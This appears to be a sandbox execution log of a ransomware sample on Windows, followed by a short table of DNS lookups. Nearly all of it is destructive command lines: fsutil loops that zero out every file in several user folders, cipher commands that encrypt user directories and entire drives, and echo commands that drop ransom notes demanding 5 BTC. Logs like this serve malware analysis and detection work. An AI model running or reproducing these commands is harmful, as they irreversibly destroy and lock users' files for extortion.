C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:D:\
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |